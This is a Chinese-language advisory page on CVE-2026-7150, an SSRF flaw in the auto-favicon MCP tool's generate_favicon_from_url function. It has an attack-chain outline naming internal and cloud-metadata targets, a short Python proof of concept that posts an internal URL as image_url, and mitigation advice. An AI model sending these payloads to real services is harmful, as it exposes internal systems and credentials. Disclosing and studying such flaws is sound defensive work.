CVE-2026-7150 CVSS 6.3 中危

CVE-2026-7150 dh1011 auto-favicon SSRF漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7150

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

dh1011 auto-favicon

漏洞概述

dh1011 auto-favicon 项目的 MCP Tool 组件中存在安全漏洞。该漏洞位于 src/auto_favicon/server.py 文件的 generate_favicon_from_url 函数中。由于对 image_url 参数缺乏充分验证，攻击者可操纵该参数触发服务器端请求伪造（SSRF）。此漏洞允许远程攻击者利用，且已有公开的利用代码，目前项目方尚未修复。

技术细节

该漏洞源于 dh1011 auto-favicon 项目在处理图标生成请求时的不安全实现。具体受影响的是 src/auto_favicon/server.py 中的 generate_favicon_from_url 函数。该函数接收用户提供的 image_url 参数，并直接使用该参数向目标服务器发起请求以获取图标数据。由于代码未对 image_url 参数进行充分的安全校验（例如未校验目标地址是否为内网IP、未限制协议等），攻击者可以通过构造恶意的 URL（如指向内部服务的 127.0.0.1 或 file:// 协议）来诱导服务器向非预期的目标发起请求。这属于典型的服务器端请求伪造（SSRF）漏洞。攻击者可利用此特性读取内部元数据、扫描内网端口或进行其他攻击。由于该产品采用滚动发布系统，受影响的版本范围未明确披露，且项目方尚未对漏洞报告做出响应，风险依然存在。

攻击链分析

STEP 1

侦察

攻击者发现目标服务运行了存在漏洞的 dh1011 auto-favicon 组件，并确定其 MCP Tool 接口可被访问。

STEP 2

构造载荷

攻击者构造包含恶意内部地址（如 http://127.0.0.1:22 或 http://169.254.169.254/latest/meta-data/）的 image_url 参数。

STEP 3

发送请求

攻击者向 generate_favicon_from_url 接口发送 POST 请求，传递包含恶意 URL 的参数。

STEP 4

服务端请求

服务器端解析请求，未进行过滤直接向攻击者指定的内部地址发起 HTTP 请求。

STEP 5

利用漏洞

根据返回的内容，攻击者可能获取敏感信息、探测内网端口或利用内部服务漏洞。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable auto-favicon service
target_url = "http://localhost:8000/generate_favicon"

# Malicious payload attempting to access an internal service (e.g., localhost admin panel)
# Attackers can also try file:// protocol or internal network scanning
malicious_image_url = "http://127.0.0.1:8080/admin"
# Alternative: file:///etc/passwd (if supported by the underlying library)

payload = {
    "image_url": malicious_image_url
}

try:
    print(f"[+] Sending SSRF payload to {target_url}...")
    response = requests.post(target_url, json=payload)
    print(f"[+] Response Status: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

dh1011 auto-favicon <= f189116a9259950c2393f114dbcb94dde0ad864b

防御指南

临时缓解措施

在官方修复发布前，建议限制对该服务的网络访问，仅允许可信来源调用。同时，可以在服务器网络层配置防火墙规则，阻断服务器向内网敏感地址发起的出站连接，以降低 SSRF 攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7150
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7150
3 Details https://www.cvedetails.com/cve/CVE-2026-7150/
4 VulDB https://vuldb.com/cve/CVE-2026-7150
5 Link https://github.com/dh1011/auto-favicon-mcp/issues/2
6 Link https://vuldb.com/submit/802054
7 Link https://vuldb.com/vuln/359749
8 Link https://vuldb.com/vuln/359749/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表